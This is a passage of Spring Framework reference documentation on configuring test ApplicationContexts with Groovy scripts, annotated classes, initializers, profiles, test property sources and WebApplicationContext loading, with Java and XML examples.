`ApplicationContext` for your tests using Groovy scripts that utilize the\n<<core.adoc#groovy-bean-definition-dsl,Groovy Bean Definition DSL>>, annotate your test class with\n`@ContextConfiguration` and configure the `locations` or `value` attribute with an array\nthat contains the resource locations of Groovy scripts. 
Resource lookup semantics for
Groovy scripts are the same as those described for <<testcontext-ctx-management-xml,XML
configuration files>>.


.Enabling Groovy script support
[TIP]
====
Support for using Groovy scripts to load an `ApplicationContext` in the Spring
TestContext Framework is enabled automatically if Groovy is on the classpath.
====

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	// ApplicationContext will be loaded from "/AppConfig.groovy" and
	// "/TestConfig.groovy" in the root of the classpath
	**@ContextConfiguration({"/AppConfig.groovy", "/TestConfig.groovy"})**
	public class MyTest {
		// class body...
	}
----

If you omit both the `locations` and `value` attributes from the `@ContextConfiguration`
annotation, the TestContext framework will attempt to detect a default Groovy script.
Specifically, `GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader`
detect a default location based on the name of the test class. If your class is named
`com.example.MyTest`, the Groovy context loader will load your application context from
`"classpath:com/example/MyTestContext.groovy"`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package com.example;

	@RunWith(SpringRunner.class)
	// ApplicationContext will be loaded from
	// "classpath:com/example/MyTestContext.groovy"
	**@ContextConfiguration**
	public class MyTest {
		// class body...
	}
----

.Declaring XML config and Groovy scripts simultaneously
[TIP]
====
Both XML configuration files and Groovy scripts can be declared simultaneously via the
`locations` or `value` attribute of `@ContextConfiguration`. If the path to a configured
resource location ends with `.xml` it will be loaded using an `XmlBeanDefinitionReader`;
otherwise it will be loaded using a `GroovyBeanDefinitionReader`.

The following listing demonstrates how to combine both in an integration test.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	// ApplicationContext will be loaded from
	// "/app-config.xml" and "/TestConfig.groovy"
	@ContextConfiguration({ "/app-config.xml", "/TestConfig.groovy" })
	public class MyTest {
		// class body...
	}
----
====

[[testcontext-ctx-management-javaconfig]]
===== Context configuration with annotated classes

To load an `ApplicationContext` for your tests using __annotated classes__ (see
<<core.adoc#beans-java, Java-based container configuration>>),
annotate your test class with `@ContextConfiguration` and configure the
`classes` attribute with an array that contains references to annotated classes.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	// ApplicationContext will be loaded from AppConfig and TestConfig
	**@ContextConfiguration(classes = {AppConfig.class, TestConfig.class})**
	public class MyTest {
		// class body...
	}
----

.Annotated Classes
[TIP]
====
The term __annotated class__ can refer to any of the following.

* A class annotated with `@Configuration`
* A component (i.e., a class annotated with `@Component`, `@Service`, `@Repository`, etc.)
* A JSR-330 compliant class that is annotated with `javax.inject` annotations
* Any other class that contains `@Bean`-methods

Consult the javadocs of `@Configuration` and `@Bean` for further information regarding
the configuration and semantics of
__annotated classes__, paying special attention to\nthe discussion of __`@Bean` Lite Mode__.\n====\n\nIf you omit the `classes` attribute from the `@ContextConfiguration` annotation, the\nTestContext framework will attempt to detect the presence of default configuration\nclasses. Specifically, `AnnotationConfigContextLoader` and\n`AnnotationConfigWebContextLoader` will detect all `static` nested classes of the test class\nthat meet the requirements for configuration class implementations as specified in the\n`@Configuration` javadocs. In the following example, the `OrderServiceTest` class\ndeclares a `static` nested configuration class named `Config` that will be automatically\nused to load the `ApplicationContext` for the test class. Note that the name of the\nconfiguration class is arbitrary. In addition, a test class can contain more than one\n`static` nested configuration class if desired.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from the\n\t\/\/ static nested Config class\n\t**@ContextConfiguration**\n\tpublic class OrderServiceTest {\n\n\t\t@Configuration\n\t\tstatic class Config {\n\n\t\t\t\/\/ this bean will be injected into the OrderServiceTest class\n\t\t\t@Bean\n\t\t\tpublic OrderService orderService() {\n\t\t\t\tOrderService orderService = new OrderServiceImpl();\n\t\t\t\t\/\/ set properties, etc.\n\t\t\t\treturn orderService;\n\t\t\t}\n\t\t}\n\n\t\t@Autowired\n\t\tprivate OrderService orderService;\n\n\t\t@Test\n\t\tpublic void testOrderService() {\n\t\t\t\/\/ test the orderService\n\t\t}\n\n\t}\n----\n\n[[testcontext-ctx-management-mixed-config]]\n===== Mixing XML, Groovy scripts, and annotated classes\n\nIt may sometimes be desirable to mix XML configuration files, Groovy scripts, and\nannotated classes (i.e., typically `@Configuration` classes) to configure an\n`ApplicationContext` for your tests. For example, if you use XML configuration in\nproduction, you may decide that you want to use `@Configuration` classes to configure\nspecific Spring-managed components for your tests, or vice versa.\n\nFurthermore, some third-party frameworks (like Spring Boot) provide first-class support\nfor loading an `ApplicationContext` from different types of resources simultaneously\n(e.g., XML configuration files, Groovy scripts, and `@Configuration` classes). The Spring\nFramework historically has not supported this for standard deployments. Consequently,\nmost of the `SmartContextLoader` implementations that the Spring Framework delivers in\nthe `spring-test` module support only one resource type per test context; however, this\ndoes not mean that you cannot use both. One exception to the general rule is that the\n`GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader` support both XML\nconfiguration files and Groovy scripts simultaneously. Furthermore, third-party\nframeworks may choose to support the declaration of both `locations` and `classes` via\n`@ContextConfiguration`, and with the standard testing support in the TestContext\nframework, you have the following options.\n\nIf you want to use resource locations (e.g., XML or Groovy) __and__ `@Configuration`\nclasses to configure your tests, you will have to pick one as the __entry point__, and\nthat one will have to include or import the other. 
For example, in XML or Groovy scripts\nyou can include `@Configuration` classes via component scanning or define them as normal\nSpring beans; whereas, in a `@Configuration` class you can use `@ImportResource` to\nimport XML configuration files or Groovy scripts. Note that this behavior is semantically\nequivalent to how you configure your application in production: in production\nconfiguration you will define either a set of XML or Groovy resource locations or a set\nof `@Configuration` classes that your production `ApplicationContext` will be loaded\nfrom, but you still have the freedom to include or import the other type of configuration.\n\n[[testcontext-ctx-management-initializers]]\n===== Context configuration with context initializers\nTo configure an `ApplicationContext` for your tests using context initializers, annotate\nyour test class with `@ContextConfiguration` and configure the `initializers` attribute\nwith an array that contains references to classes that implement\n`ApplicationContextInitializer`. The declared context initializers will then be used to\ninitialize the `ConfigurableApplicationContext` that is loaded for your tests. Note that\nthe concrete `ConfigurableApplicationContext` type supported by each declared\ninitializer must be compatible with the type of `ApplicationContext` created by the\n`SmartContextLoader` in use (i.e., typically a `GenericApplicationContext`).\nFurthermore, the order in which the initializers are invoked depends on whether they\nimplement Spring's `Ordered` interface or are annotated with Spring's `@Order` annotation\nor the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from TestConfig\n\t\/\/ and initialized by TestAppCtxInitializer\n\t**@ContextConfiguration(\n\t\tclasses = TestConfig.class,\n\t\tinitializers = TestAppCtxInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIt is also possible to omit the declaration of XML configuration files, Groovy scripts,\nor annotated classes in `@ContextConfiguration` entirely and instead declare only\n`ApplicationContextInitializer` classes which are then responsible for registering beans\nin the context -- for example, by programmatically loading bean definitions from XML\nfiles or configuration classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by EntireAppInitializer\n\t\/\/ which presumably registers beans in the context\n\t**@ContextConfiguration(initializers = EntireAppInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-inheritance]]\n===== Context configuration inheritance\n`@ContextConfiguration` supports boolean `inheritLocations` and `inheritInitializers`\nattributes that denote whether resource locations or annotated classes and context\ninitializers declared by superclasses should be __inherited__. The default value for\nboth flags is `true`. This means that a test class inherits the resource locations or\nannotated classes as well as the context initializers declared by any superclasses.\nSpecifically, the resource locations or annotated classes for a test class are appended\nto the list of resource locations or annotated classes declared by superclasses.\nSimilarly, the initializers for a given test class will be added to the set of\ninitializers defined by test superclasses. 
Thus, subclasses have the option\nof __extending__ the resource locations, annotated classes, or context initializers.\n\nIf the `inheritLocations` or `inheritInitializers` attribute in `@ContextConfiguration`\nis set to `false`, the resource locations or annotated classes and the context\ninitializers, respectively, for the test class __shadow__ and effectively replace the\nconfiguration defined by superclasses.\n\nIn the following example that uses XML resource locations, the `ApplicationContext` for\n`ExtendedTest` will be loaded from __\"base-config.xml\"__ __and__\n__\"extended-config.xml\"__, in that order. Beans defined in __\"extended-config.xml\"__ may\ntherefore __override__ (i.e., replace) those defined in __\"base-config.xml\"__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\"\n\t\/\/ in the root of the classpath\n\t**@ContextConfiguration(\"\/base-config.xml\")**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\" and\n\t\/\/ \"\/extended-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(\"\/extended-config.xml\")**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, in the following example that uses annotated classes, the\n`ApplicationContext` for `ExtendedTest` will be loaded from the `BaseConfig` __and__\n`ExtendedConfig` classes, in that order. Beans defined in `ExtendedConfig` may therefore\noverride (i.e., replace) those defined in `BaseConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from BaseConfig\n\t**@ContextConfiguration(classes = BaseConfig.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from BaseConfig and ExtendedConfig\n\t**@ContextConfiguration(classes = ExtendedConfig.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIn the following example that uses context initializers, the `ApplicationContext` for\n`ExtendedTest` will be initialized using `BaseInitializer` __and__\n`ExtendedInitializer`. Note, however, that the order in which the initializers are\ninvoked depends on whether they implement Spring's `Ordered` interface or are annotated\nwith Spring's `@Order` annotation or the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t**@ContextConfiguration(initializers = BaseInitializer.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t\/\/ and ExtendedInitializer\n\t**@ContextConfiguration(initializers = ExtendedInitializer.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles]]\n===== Context configuration with environment profiles\nSpring 3.1 introduced first-class support in the framework for the notion of\nenvironments and profiles (a.k.a., __bean definition profiles__), and integration tests\ncan be configured to activate particular bean definition profiles for various testing\nscenarios. 
This is achieved by annotating a test class with the `@ActiveProfiles`\nannotation and supplying a list of profiles that should be activated when loading the\n`ApplicationContext` for the test.\n\n[NOTE]\n====\n`@ActiveProfiles` may be used with any implementation of the new `SmartContextLoader`\nSPI, but `@ActiveProfiles` is not supported with implementations of the older\n`ContextLoader` SPI.\n====\n\nLet's take a look at some examples with XML configuration and `@Configuration` classes.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- app-config.xml -->\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<bean id=\"transferService\"\n\t\t\t\tclass=\"com.bank.service.internal.DefaultTransferService\">\n\t\t\t<constructor-arg ref=\"accountRepository\"\/>\n\t\t\t<constructor-arg ref=\"feePolicy\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"accountRepository\"\n\t\t\t\tclass=\"com.bank.repository.internal.JdbcAccountRepository\">\n\t\t\t<constructor-arg ref=\"dataSource\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"feePolicy\"\n\t\t\tclass=\"com.bank.service.internal.ZeroFeePolicy\"\/>\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\n\t\t<beans profile=\"default\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"classpath:\/app-config.xml\"\n\t@ContextConfiguration(\"\/app-config.xml\")\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nWhen `TransferServiceTest` is run, its `ApplicationContext` will be loaded from the\n`app-config.xml` configuration file in the root of the classpath. If you inspect\n`app-config.xml` you'll notice that the `accountRepository` bean has a dependency on a\n`dataSource` bean; however, `dataSource` is not defined as a top-level bean. Instead,\n`dataSource` is defined three times: in the __production__ profile, the\n__dev__ profile, and the __default__ profile.\n\nBy annotating `TransferServiceTest` with `@ActiveProfiles(\"dev\")` we instruct the Spring\nTestContext Framework to load the `ApplicationContext` with the active profiles set to\n`{\"dev\"}`. As a result, an embedded database will be created and populated with test data,\nand the `accountRepository` bean will be wired with a reference to the development\n`DataSource`. And that's likely what we want in an integration test.\n\nIt is sometimes useful to assign beans to a `default` profile. 
Beans within the default profile\nare only included when no other profile is specifically activated. This can be used to define\n_fallback_ beans to be used in the application's default state. For example, you may\nexplicitly provide a data source for `dev` and `production` profiles, but define an in-memory\ndata source as a default when neither of these is active.\n\nThe following code listings demonstrate how to implement the same configuration and\nintegration test but using `@Configuration` classes instead of XML.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"dev\")\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"default\")\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class TransferServiceConfig {\n\n\t\t@Autowired DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new DefaultTransferService(accountRepository(), feePolicy());\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic FeePolicy feePolicy() {\n\t\t\treturn new ZeroFeePolicy();\n\t\t}\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nIn this variation, we have split the XML configuration into four independent\n`@Configuration` classes:\n\n* `TransferServiceConfig`: acquires a `dataSource` via dependency injection using\n `@Autowired`\n* `StandaloneDataConfig`: defines a `dataSource` for an embedded database suitable for\n developer tests\n* `JndiDataConfig`: defines a `dataSource` that is retrieved from JNDI in a production\n environment\n* `DefaultDataConfig`: defines a `dataSource` for a default embedded database in case\n no profile is active\n\nAs with the XML-based configuration example, we still annotate `TransferServiceTest`\nwith `@ActiveProfiles(\"dev\")`, but this time we specify all four configuration classes\nvia the `@ContextConfiguration` annotation. 
The body of the test class itself remains\ncompletely unchanged.\n\nIt is often the case that a single set of profiles is used across multiple test classes\nwithin a given project. Thus, to avoid duplicate declarations of the `@ActiveProfiles`\nannotation it is possible to declare `@ActiveProfiles` once on a base class, and\nsubclasses will automatically inherit the `@ActiveProfiles` configuration from the base\nclass. In the following example, the declaration of `@ActiveProfiles` (as well as other\nannotations) has been moved to an abstract superclass, `AbstractIntegrationTest`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic abstract class AbstractIntegrationTest {\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile inherited from superclass\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\n`@ActiveProfiles` also supports an `inheritProfiles` attribute that can be used to\ndisable the inheritance of active profiles.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden with \"production\"\n\t@ActiveProfiles(profiles = \"production\", inheritProfiles = false)\n\tpublic class ProductionTransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles-ActiveProfilesResolver]]\nFurthermore, it is sometimes necessary to resolve active profiles for tests\n__programmatically__ instead of declaratively -- for example, based on:\n\n* the current operating system\n* whether tests are being executed on a continuous integration build server\n* the presence of certain environment variables\n* the presence of custom class-level annotations\n* etc.\n\nTo resolve active bean definition profiles programmatically, simply implement a custom\n`ActiveProfilesResolver` and register it via the `resolver` attribute of\n`@ActiveProfiles`. The following example demonstrates how to implement and register a\ncustom `OperatingSystemActiveProfilesResolver`. 
For further information, refer to the
corresponding javadocs.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package com.bank.service;

	// "dev" profile overridden programmatically via a custom resolver
	@ActiveProfiles(
		resolver = OperatingSystemActiveProfilesResolver.class,
		inheritProfiles = false)
	public class TransferServiceTest extends AbstractIntegrationTest {
		// test body
	}
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package com.bank.service.test;

	public class OperatingSystemActiveProfilesResolver implements ActiveProfilesResolver {

		@Override
		public String[] resolve(Class<?> testClass) {
			String profile = ...;
			// determine the value of profile based on the operating system
			return new String[] {profile};
		}
	}
----

[[testcontext-ctx-management-property-sources]]
===== Context configuration with test property sources

Spring 3.1 introduced first-class support in the framework for the notion of an
environment with a hierarchy of _property sources_, and since Spring 4.1 integration
tests can be configured with test-specific property sources. In contrast to the
`@PropertySource` annotation used on `@Configuration` classes, the `@TestPropertySource`
annotation can be declared on a test class to declare resource locations for test
properties files or _inlined_ properties. These test property sources will be added to
the set of `PropertySources` in the `Environment` for the `ApplicationContext` loaded
for the annotated integration test.

[NOTE]
====
`@TestPropertySource` may be used with any implementation of the `SmartContextLoader`
SPI, but `@TestPropertySource` is not supported with implementations of the older
`ContextLoader` SPI.

Implementations of `SmartContextLoader` gain access to merged test property source values
via the `getPropertySourceLocations()` and `getPropertySourceProperties()` methods in
`MergedContextConfiguration`.
====

*Declaring test property sources*

Test properties files can be configured via the `locations` or `value` attribute of
`@TestPropertySource` as shown in the following example.

Both traditional and XML-based properties file formats are supported -- for example,
`"classpath:/com/example/test.properties"` or `"file:///path/to/file.xml"`.

Each path will be interpreted as a Spring `Resource`. A plain path -- for example,
`"test.properties"` -- will be treated as a classpath resource that is _relative_ to the
package in which the test class is defined. A path starting with a slash will be treated
as an _absolute_ classpath resource, for example: `"/org/example/test.xml"`. A path which
references a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.) will
be loaded using the specified resource protocol. Resource location wildcards (e.g.
`**/*.properties`) are not permitted: each location must evaluate to exactly one
`.properties` or `.xml` resource.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@ContextConfiguration
	@TestPropertySource("/test.properties")
	public class MyIntegrationTests {
		// class body...
	}
----

_Inlined_ properties in the form of key-value pairs can be configured via the
`properties` attribute of `@TestPropertySource` as shown in the following example.
All key-value pairs will be added to the enclosing `Environment` as a single test
`PropertySource` with the highest precedence.

The supported syntax for key-value pairs is the same as the syntax defined for entries in
a Java properties file:

* `"key=value"`
* `"key:value"`
* `"key value"`

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@ContextConfiguration
	@TestPropertySource(properties = {"timezone = GMT", "port: 4242"})
	public class MyIntegrationTests {
		// class body...
	}
----

*Default properties file detection*

If `@TestPropertySource` is declared as an empty annotation (i.e., without explicit
values for the `locations` or `properties` attributes), an attempt will be made to detect
a _default_ properties file relative to the class that declared the annotation. For
example, if the annotated test class is `com.example.MyTest`, the corresponding default
properties file is `"classpath:com/example/MyTest.properties"`. If the default cannot be
detected, an `IllegalStateException` will be thrown.

*Precedence*

Test property sources have higher precedence than those loaded from the operating
system's environment or Java system properties as well as property sources added by the
application declaratively via `@PropertySource` or programmatically. Thus, test property
sources can be used to selectively override properties defined in system and application
property sources. Furthermore, inlined properties have higher precedence than properties
loaded from resource locations.

In the following example, the `timezone` and `port` properties as well as any properties
defined in `"/test.properties"` will override any properties of the same name that are
defined in system and application property sources. Furthermore, if the
`"/test.properties"` file defines entries for the `timezone` and `port` properties, those
will be overridden by the _inlined_ properties declared via the `properties` attribute.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@ContextConfiguration
	@TestPropertySource(
		locations = "/test.properties",
		properties = {"timezone = GMT", "port: 4242"}
	)
	public class MyIntegrationTests {
		// class body...
	}
----

*Inheriting and overriding test property sources*

`@TestPropertySource` supports boolean `inheritLocations` and `inheritProperties`
attributes that denote whether resource locations for properties files and inlined
properties declared by superclasses should be __inherited__. The default value for both
flags is `true`. This means that a test class inherits the locations and inlined
properties declared by any superclasses. Specifically, the locations and inlined
properties for a test class are appended to the locations and inlined properties declared
by superclasses. Thus, subclasses have the option of __extending__ the locations and
inlined properties. Note that properties that appear later will __shadow__ (i.e.,
override) properties of the same name that appear earlier.
In addition, the\naforementioned precedence rules apply for inherited test property sources as well.\n\nIf the `inheritLocations` or `inheritProperties` attribute in `@TestPropertySource` is set\nto `false`, the locations or inlined properties, respectively, for the test class __shadow__\nand effectively replace the configuration defined by superclasses.\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using\nonly the `\"base.properties\"` file as a test property source. In contrast, the\n`ApplicationContext` for `ExtendedTest` will be loaded using the `\"base.properties\"`\n**and** `\"extended.properties\"` files as test property source locations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(\"base.properties\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(\"extended.properties\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using only\nthe _inlined_ `key1` property. In contrast, the `ApplicationContext` for `ExtendedTest` will be\nloaded using the _inlined_ `key1` and `key2` properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(properties = \"key1 = value1\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(properties = \"key2 = value2\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\n[[testcontext-ctx-management-web]]\n===== Loading a WebApplicationContext\nSpring 3.2 introduced support for loading a `WebApplicationContext` in integration\ntests. To instruct the TestContext framework to load a `WebApplicationContext` instead\nof a standard `ApplicationContext`, simply annotate the respective test class with\n`@WebAppConfiguration`.\n\nThe presence of `@WebAppConfiguration` on your test class instructs the TestContext\nframework (TCF) that a `WebApplicationContext` (WAC) should be loaded for your\nintegration tests. In the background the TCF makes sure that a `MockServletContext` is\ncreated and supplied to your test's WAC. By default the base resource path for your\n`MockServletContext` will be set to __\"src\/main\/webapp\"__. This is interpreted as a path\nrelative to the root of your JVM (i.e., normally the path to your project). If you're\nfamiliar with the directory structure of a web application in a Maven project, you'll\nknow that __\"src\/main\/webapp\"__ is the default location for the root of your WAR. If you\nneed to override this default, simply provide an alternate path to the\n`@WebAppConfiguration` annotation (e.g., `@WebAppConfiguration(\"src\/test\/webapp\")`). If\nyou wish to reference a base resource path from the classpath instead of the file\nsystem, just use Spring's __classpath:__ prefix.\n\nPlease note that Spring's testing support for `WebApplicationContexts` is on par with its\nsupport for standard `ApplicationContexts`. When testing with a `WebApplicationContext`\nyou are free to declare XML configuration files, Groovy scripts, or `@Configuration`\nclasses via `@ContextConfiguration`. 
You are of course also free to use any other test\nannotations such as `@ActiveProfiles`, `@TestExecutionListeners`, `@Sql`, `@Rollback`,\netc.\n\nThe following examples demonstrate some of the various configuration options for loading\na `WebApplicationContext`.\n\n.Conventions\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ defaults to \"file:src\/main\/webapp\"\n\t@WebAppConfiguration\n\n\t\/\/ detects \"WacTests-context.xml\" in same package\n\t\/\/ or static nested @Configuration class\n\t@ContextConfiguration\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThe above example demonstrates the TestContext framework's support for __convention over\nconfiguration__. If you annotate a test class with `@WebAppConfiguration` without\nspecifying a resource base path, the resource path will effectively default\nto __\"file:src\/main\/webapp\"__. Similarly, if you declare `@ContextConfiguration` without\nspecifying resource `locations`, annotated `classes`, or context `initializers`, Spring\nwill attempt to detect the presence of your configuration using conventions\n(i.e., __\"WacTests-context.xml\"__ in the same package as the `WacTests` class or static\nnested `@Configuration` classes).\n\n.Default resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ file system resource\n\t@WebAppConfiguration(\"webapp\")\n\n\t\/\/ classpath resource\n\t@ContextConfiguration(\"\/spring\/test-servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThis example demonstrates how to explicitly declare a resource base path with\n`@WebAppConfiguration` and an XML resource location with `@ContextConfiguration`. The\nimportant thing to note here is the different semantics for paths with these two\nannotations. By default, `@WebAppConfiguration` resource paths are file system based;\nwhereas, `@ContextConfiguration` resource locations are classpath based.\n\n.Explicit resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ classpath resource\n\t@WebAppConfiguration(\"classpath:test-web-resources\")\n\n\t\/\/ file system resource\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nIn this third example, we see that we can override the default resource semantics for\nboth annotations by specifying a Spring resource prefix. Contrast the comments in this\nexample with the previous example.\n\n.[[testcontext-ctx-management-web-mocks]]Working with Web Mocks\n--\nTo provide comprehensive web testing support, Spring 3.2 introduced a\n`ServletTestExecutionListener` that is enabled by default. When testing against 